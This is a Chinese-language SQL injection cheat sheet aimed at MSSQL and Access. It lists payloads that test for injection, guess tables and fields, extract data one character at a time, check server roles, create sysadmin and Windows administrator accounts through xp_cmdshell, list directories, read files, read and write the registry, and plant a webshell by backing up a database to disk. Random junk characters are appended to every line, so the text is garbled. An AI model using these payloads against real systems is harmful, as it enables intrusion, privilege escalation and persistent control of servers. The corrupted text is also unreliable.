1.判断是否有注入;and 1=1 ;and 1=2 q!W,2xqZoq
2.初步判断是否是mssql ;and user>0 pS8\ B
E#P#{_BR^
3.注入参数是字符'and [查询条件] and ''=' .J -k^+-
1V`-D8-?
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ">7xSWR*4
LHtO|Utn(
5.判断数据库系统 ddL3wQ
;X+0,K3c
;and (select count(*) from sysobjects)>0 mssql ubB1a_7
rZ,qHM
;and (select count(*) from msysobjects)>0 access MZ%J
]Nd
i@:^b_
-$!r+4|q
2l,>x
6.猜数据库 ;and (select Count(*) from [数据库名])>0 P:g!~&Q
\:h7,[e
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &</)k|.A6\
lfBCzxifC
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `0ZH=*P
9L7z<ntn
9.(1)猜字段的ascii值(access) X(Af`KOg[
6Zpa[,gm
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "6]oi*_8
G739Ne[gL
(2)猜字段的ascii值(mssql) UZ/LR
D*@'%<?
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #reR<qp&]
n$ByTmKxv
10.测试权限结构(mssql) 12i`82>;
k|x mZA*
Dz hLb8k
T}\>8EEG
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- !l dE9 .
~98q1HgS]D
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- :&5u)
BUZ74
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7r,GdP .
V@+sNM
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- jA8Bmwt;w
H`<u2fo|p
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 1<h@^s ;
/7B3z}rd
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +Q"s!\5
&K!0yR
;and 1=(select IS_MEMBER('db_owner'));-- _&(Wz0
!rgXB(
zx)}XOYf
.z
CkB86
11.添加mssql和系统的帐户 ;xq;c\N
=l2 @'Y Q
;exec master.dbo.sp_addlogin username;-- W\Il@Je;
;exec master.dbo.sp_password null,username,password;-- HziQ%QR
B_#M)d
O
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- `!N.1RP _
,PpVZq~
;exec master.dbo.xp_cmdshell 'net user username password Y<^Or
mr[ 1F]G
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- VB^1wm
4Tuh]5
;exec master.dbo.xp_cmdshell 'net user username password /add';-- k'.cl^6Z8
'n{=`e(}cI
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- e8SAjl"}
Q$Qr)mcC
:V"e+I
hJFxT8B/
12.(1)遍历目录 c 9gm%
@ #J2t#
;create table dirs(paths varchar(100), id int) DM6(8df(
c(Xm~
'jeH
;insert dirs exec master.dbo.xp_dirtree 'c:\' vzAY+EEx
1OY
5tq
;and (select top 1 paths from dirs)>0 ,*Wh{)
m k~F@
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 0I)eYksh
ko!]vHB9`
fZs}u<3Q)
3-y2i/4}$
(2)遍历目录 V
7 p{'C
|p/[sD+M
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- $XyDw|z[
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 %7[d5[U~ZA
{o'(_.{
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "@+Z1k-8U
{JQV~rfh`
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 m,5m'9dj
abVEi[nP
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 QeQwmI
4,`t9f^:
j0cB#M44
FKtCUq,:
13.mssql中的存储过程 q.hpnE~#lh
DBfq9%J _
xp_regenumvalues 注册表根键, 子键 &4t=Y`]SL
u<\Sf" fs
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 2zsDb'r
$*fEgU% c
xp_regread 根键,子键,键值名 ?YFSK
o|KmKC n>
;exec xp_regread Fyz1LOH[X
|Ntretz`\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值 !':y8(Ou
P` CQ)o
xp_regwrite 根键,子键, 值名, 值类型, 值 9$sx+=(
1b7 Q-elG
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 06af{FXsGb
lA,[&
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 >U:.5Tch'V
/z1-4:^`A[
xp_regdeletevalue 根键,子键,值名 *6(/5V
nqYarHi
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 V[*<^%
~c,+)69"T
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ZB$,\|^6
UWgPQ%}
d~CZ9h
:Mu]*N
14.mssql的backup创建webshell ['c*<f"
D2
7?Twhs.O
use model GKXd"8z]
wx/*un%2
create table cmd(str image); *]S&V'Di
B%co`0$
insert into cmd(str) values (''); r+k~%5Ff~
(Ixmg=C6y
backup database model to disk='c:\l.asp'; ,Igd<A=
z}$!B.)
t;
#D,gx
?D@WXE0a
15.mssql内置函数 p ^I#9(PT
]1bN cq2I
;and (select @@version)>0 获得Windows的版本号 ];{CNDAL2
K{G\=yJ((
;and user_name()='dbo' 判断当前系统的连接用户是不是sa d?GB#N|+g
covK6SH
;and (select user_name())>0 爆当前系统的连接用户 dr=h;[Q'
?&XpwJw:~
;and (select db_name())>0 得到当前连接的数据库 8 }OII\
>`
|sBx
35#"]l"
w2]]##J
16.简洁的webshell Kb#Z(C9
^,fMs:
use model u3vw[k
`Yo!sgPO\
create table cmd(str image); hRktvO)K
Tml>>O
insert into cmd(str) values (''); hLSas#B>
G8CM
backup database model to disk='g:\wwwtest\l.asp';